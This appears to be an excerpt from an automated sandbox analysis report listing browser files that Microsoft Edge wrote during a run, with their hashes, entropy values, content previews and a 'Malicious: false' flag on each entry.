Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ed01.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1100377054653405
Encrypted:	false
SSDEEP:	192:stwkdpBsPuBaFvrE9kDKqc8JbV+FEpQAnUvOiPgYJ:stwQBsPuBCDBbGmQ5P
MD5:	7443935C83C78EB352AE178E583570C9
SHA1:	B69DB373B955B356017836F9BDAAC3794439F1F8
SHA-256:	DD7D45DA05FFE9067173261615E6C4159C19FF25BC6784C9C91A4212282E5700
SHA-512:	906245D333B5C77CA207EC8DC6F801AFB08CB510577C181745DEE5B8D15E819002502761E5C2C826FBC50A85A3CE30331F49DB2ABEE547E7F38A4B305784512A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF41578.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1100377054653405
Encrypted:	false
SSDEEP:	192:stwkdpBsPuBaFvrE9kDKqc8JbV+FEpQAnUvOiPgYJ:stwQBsPuBCDBbGmQ5P
MD5:	7443935C83C78EB352AE178E583570C9
SHA1:	B69DB373B955B356017836F9BDAAC3794439F1F8
SHA-256:	DD7D45DA05FFE9067173261615E6C4159C19FF25BC6784C9C91A4212282E5700
SHA-512:	906245D333B5C77CA207EC8DC6F801AFB08CB510577C181745DEE5B8D15E819002502761E5C2C826FBC50A85A3CE30331F49DB2ABEE547E7F38A4B305784512A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF44ded.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1100377054653405
Encrypted:	false
SSDEEP:	192:stwkdpBsPuBaFvrE9kDKqc8JbV+FEpQAnUvOiPgYJ:stwQBsPuBCDBbGmQ5P
MD5:	7443935C83C78EB352AE178E583570C9
SHA1:	B69DB373B955B356017836F9BDAAC3794439F1F8
SHA-256:	DD7D45DA05FFE9067173261615E6C4159C19FF25BC6784C9C91A4212282E5700
SHA-512:	906245D333B5C77CA207EC8DC6F801AFB08CB510577C181745DEE5B8D15E819002502761E5C2C826FBC50A85A3CE30331F49DB2ABEE547E7F38A4B305784512A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4aa94.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9861
Entropy (8bit):	5.1100377054653405
Encrypted:	false
SSDEEP:	192:stwkdpBsPuBaFvrE9kDKqc8JbV+FEpQAnUvOiPgYJ:stwQBsPuBCDBbGmQ5P
MD5:	7443935C83C78EB352AE178E583570C9
SHA1:	B69DB373B955B356017836F9BDAAC3794439F1F8
SHA-256:	DD7D45DA05FFE9067173261615E6C4159C19FF25BC6784C9C91A4212282E5700
SHA-512:	906245D333B5C77CA207EC8DC6F801AFB08CB510577C181745DEE5B8D15E819002502761E5C2C826FBC50A85A3CE30331F49DB2ABEE547E7F38A4B305784512A
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376815772774198","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.566956313560598
Encrypted:	false
SSDEEP:	768:frqMzWWPzW5w3vf4Wd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP1lInEbJrwXOJppt2:fu6WizWa3vfrdu1jao4G6ept2
MD5:	7A5E5A879B90D051E034CC04723B296B
SHA1:	1165750789C1AC954F5C4AEF749FD0BBAB9A3781
SHA-256:	0897C79A951F787E4FE08826458099A98FCA30AA30B3280BF4BFE4BB363091C8
SHA-512:	8963D746FA35E0CF8779AC1EA5D1DD8B180E3603B01DF88D9947060367495FEB10A7A768CEE9C608B88CFC8787913186C6F9F3ACE0B500EE4085D38053FDEC57
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376815771478844","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376815771478844","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3e9d4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.566956313560598
Encrypted:	false
SSDEEP:	768:frqMzWWPzW5w3vf4Wd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP1lInEbJrwXOJppt2:fu6WizWa3vfrdu1jao4G6ept2
MD5:	7A5E5A879B90D051E034CC04723B296B
SHA1:	1165750789C1AC954F5C4AEF749FD0BBAB9A3781
SHA-256:	0897C79A951F787E4FE08826458099A98FCA30AA30B3280BF4BFE4BB363091C8
SHA-512:	8963D746FA35E0CF8779AC1EA5D1DD8B180E3603B01DF88D9947060367495FEB10A7A768CEE9C608B88CFC8787913186C6F9F3ACE0B500EE4085D38053FDEC57
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376815771478844","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376815771478844","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.828785414211876
Encrypted:	false
SSDEEP:	24:F2xc5Nmi/ocncmo0CRORpllg2DsfRHOksVdCRORpllg2Sc03osxOKCRORpllg2Dz:F2emiBtrdDsfB6XrdYxBrdDvBlErd8Bv
MD5:	CCC5380CAEE059FD119B486520861A5F
SHA1:	44E3D46D59B003CA112FD73B152A412972C3EA95
SHA-256:	A1258784658D9CB2545F480CEDFBFD3F81050AE576E0FB904E51FA55B177AF9B
SHA-512:	3C09856D899BF7E4E9EF9B8A31ECC6BC0E9C2750C46CB76F3FFD70F547F003EA1DEF1494B11466D7D8239BF462C12B629FB6C6B338600656823ACD33FF430174
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2....m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x..................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	303
Entropy (8bit):	5.135337187136333
Encrypted:	false
SSDEEP:	6:HGJ9u2j1N723oH+TcwtE/a252KLlVGJ9uiRt+q2PN723oH+TcwtE/a2ZIFUv:caYeb8xLtvVaYeb8J2FUv
MD5:	55776E8E2B095DBA24E36F096292BFC1
SHA1:	81946B9CD7D9387DB9994C731FF2FCC1BB697ABD
SHA-256:	7AD7A58AD4012FC294543C4CCDF5E01135937A1123590ECD3AE54C7A31F3850A
SHA-512:	435C17C2D41757C3CBF512F4607986B55F4F443F8E57E254E5D49BFD696C07CFFE91B3610CF6E71AF51A8D892D29625A2F9FA3A40A1C9255C08EC9942AA32E48
Malicious:	false
Preview:	2024/11/23-01:09:50.005 1d48 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/23-01:09:50.016 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	114376
Entropy (8bit):	5.577243360270816
Encrypted:	false
SSDEEP:	1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKPt3dfvYgmY:d9LyxPXfOxr1lMe1nL/CL/TXEmsvFV
MD5:	9B84CD1B5D27BFFD0371A020F288D7E7
SHA1:	04A99A3E07509C8EBC436E0C3B0CE90207E7C879
SHA-256:	58E76813468CBD1016C20B8421A44CA30E0435F0DE399386A718BCE130F1F580
SHA-512:	6ABEE3D0306CBE0F80AFA398A5BDA0D7F1543207989062B8FA9814B8BB1C0B5063E01E8DD8905CA3AF78020E2037BC90AA599727E5D54B93B8D2A3EC31861B95
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	188881
Entropy (8bit):	6.38623261578861
Encrypted:	false
SSDEEP:	3072:8m43o+LAeeJ0OwT9WtrBL/vRMhj0y1RzlJCplXe5Gm:F4fNOwMtdL/ZE0Yz64N
MD5:	529C6948224B9BCDD4FF9EBF20B6816A
SHA1:	AFB233627303A74770FE550471C9A02A4F5FA000
SHA-256:	86A03B0D4D7DDCE174096D2F625285438933C315ECD8CA470BA91EC25B680E04
SHA-512:	9ECAE375907A2E612E93F2CD4F445C739A458A4F38EADD7FE2026890418506F778BE493F5330E7DDB59744FA25363CC56D4332157B94BC932352D667A78BAC0B
Malicious:	false
Preview:	0\r..m..........rSG.....0...../...............R......yTx........,T.8..`,.....L`.....,T...`......L`......Rc.C.....exports...Rc...R....module....Rc..@.....define....Rb2..p....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m..T..b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....zY...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.527150097341792
Encrypted:	false
SSDEEP:	3:VCBmctAyXl/ly/l9/lxE0tlla/lVgj+:oBxjmO0g2C
MD5:	1D6D7294047A92EF2AFBFB94F59DB526
SHA1:	F8A92C139697FAE0E3B20AB6CBC925988F71FFB1
SHA-256:	31C9C7A39C4DC0170FE43CE7B0BA7A4B8C4B5570D3ACC0990EB8C5E6D2635490
SHA-512:	7CB50EA799CF8FBCEAFB6C084EAA3A859633C70C4E92E598A762A1777428F17AA489534CA4908477FDEB1EBA21AE6BB286FF9531F24E615BF709B50FBE995310
Malicious:	false
Preview:	@.......oy retne.........................X....,................*Zr.$./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.527150097341792
Encrypted:	false
SSDEEP:	3:VCBmctAyXl/ly/l9/lxE0tlla/lVgj+:oBxjmO0g2C
MD5:	1D6D7294047A92EF2AFBFB94F59DB526
SHA1:	F8A92C139697FAE0E3B20AB6CBC925988F71FFB1
SHA-256:	31C9C7A39C4DC0170FE43CE7B0BA7A4B8C4B5570D3ACC0990EB8C5E6D2635490
SHA-512:	7CB50EA799CF8FBCEAFB6C084EAA3A859633C70C4E92E598A762A1777428F17AA489534CA4908477FDEB1EBA21AE6BB286FF9531F24E615BF709B50FBE995310
Malicious:	false
Preview:	@.......oy retne.........................X....,................*Zr.$./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF43351.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.527150097341792
Encrypted:	false
SSDEEP:	3:VCBmctAyXl/ly/l9/lxE0tlla/lVgj+:oBxjmO0g2C
MD5:	1D6D7294047A92EF2AFBFB94F59DB526
SHA1:	F8A92C139697FAE0E3B20AB6CBC925988F71FFB1
SHA-256:	31C9C7A39C4DC0170FE43CE7B0BA7A4B8C4B5570D3ACC0990EB8C5E6D2635490
SHA-512:	7CB50EA799CF8FBCEAFB6C084EAA3A859633C70C4E92E598A762A1777428F17AA489534CA4908477FDEB1EBA21AE6BB286FF9531F24E615BF709B50FBE995310
Malicious:	false
Preview:	@.......oy retne.........................X....,................*Zr.$./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	6753
Entropy (8bit):	3.373216758329305
Encrypted:	false
SSDEEP:	96:+9C0EsLZ7Q69xBeijqtj+mAV23Zf+9X3+V4+Vi09O5SLl9iSrY1xQIdjJ:HXsLX4iMCTl9X3+2Kil5SLl9iSrYD/N
MD5:	0B2A814AA940F93516BD985D11D1D5B6
SHA1:	DE13008E1E7EEEA2A444641D3CD0681E1A51F5B7
SHA-256:	AECF67111154D138C416B098B00A018C2C8D0B5F1D6D31FD5350E97D7D81592D
SHA-512:	F8419B44F4A10EEEA02C6EBC8B59BA987D63B6812D301C6545C20977CB4185B6D26BADAD7729FD774D3B2CFFBD9A3109341241A2A61E20A88325D5D69C2177B1
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...................b................next-map-id.1.Cnamespace-f9753f6f_0836_4ad6_8ab7_4887aadc1752-https://ntp.msn.com/.0V.e................V.e................V.e................V.e..................-..................map-0-shd_sweeper.1{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.a.d.s.-.f.l.r.m.g.p.-.t.u.n.e.d.-.t.,.s.i.d.-.f.l.r.n.o.i.s.e.2.,.s.i.d.a.m.o.-.f.l.r.-.s.t.a.g.e.,.p.r.g.-.1.s.-.d.w.v.i.d.-.c.t.r.,.p.r.g.-.1.s.w.-.m.i.t.o.t.d.u.s.-.c.,.i.c.r.s.c.a.l.l.-.s.p.-.c.t.l.,.p.r.g.-.1.s.w.-.s.a.v.a.n.i.l.l.a.p.r.o.d.,.p.r.g.-.1.s.w.-.b.g.a.b.r.t.p.g.-.r.,.p.r.g.-.1.s.w.-.r.e.v._.a.b.r.t.p.g.,.p.r.g.-.1.s.w.-.r.e.v._.b.g._.a.b.r.t.p.g.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.092679613462435
Encrypted:	false
SSDEEP:	6:HGJ9uDUg39+q2PN723oH+TcwtrQMxIFUt8YGJ9uDVJZmw+YGJ9uDlOHE9VkwON7E:aM+vVaYebCFUt8K/+lCV5OaYebtJ
MD5:	AF24659C2C83B1810AD7DD8FAC456E5D
SHA1:	B76CBCD28CD95016621BF6E22919D643B2C390CF
SHA-256:	B2FA1F9934EF12C9A2F3654990DBA766FAB0134C7885DC1BBE123022173B2E1F
SHA-512:	092A63E1633FD6D3DDE01B9237DCA084F08317560CA6844319DF1FFC3A6DA61DEA2171D15C88EDB7610018471C5AE6E845D27BDDCA30FBBD4F88CD1AFEAB81EC
Malicious:	false
Preview:	2024/11/23-01:09:32.902 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/23-01:09:32.904 1dbc Recovering log #3.2024/11/23-01:09:32.991 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.092679613462435
Encrypted:	false
SSDEEP:	6:HGJ9uDUg39+q2PN723oH+TcwtrQMxIFUt8YGJ9uDVJZmw+YGJ9uDlOHE9VkwON7E:aM+vVaYebCFUt8K/+lCV5OaYebtJ
MD5:	AF24659C2C83B1810AD7DD8FAC456E5D
SHA1:	B76CBCD28CD95016621BF6E22919D643B2C390CF
SHA-256:	B2FA1F9934EF12C9A2F3654990DBA766FAB0134C7885DC1BBE123022173B2E1F
SHA-512:	092A63E1633FD6D3DDE01B9237DCA084F08317560CA6844319DF1FFC3A6DA61DEA2171D15C88EDB7610018471C5AE6E845D27BDDCA30FBBD4F88CD1AFEAB81EC
Malicious:	false
Preview:	2024/11/23-01:09:32.902 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/23-01:09:32.904 1dbc Recovering log #3.2024/11/23-01:09:32.991 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13376815773984991

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.7845925448910336
Encrypted:	false
SSDEEP:	24:3U1a5PopsAF4unxetLp3X2amEtG1ChqjGWz2QKkOAM4:3U8PozFgLp2FEkChoGqnHOp
MD5:	8917C97F77AFB124A2694F28B34A962F
SHA1:	3BD19B242D003342A30D82AF9B7925DAB4E69F94
SHA-256:	4060F848C92DDA78E63BE50941A1AE512E18BAE1D0BF4DEC97EDFDBE1B4FE444
SHA-512:	BDCE61CFFE666B8CB2C22693A6432E594FB27920CA069C209C2B88B546D45C357337DB7EA86FD11AB53EB5B9C21AC5AF39F147665A7A2478D59C860AE0E50FC1
Malicious:	false
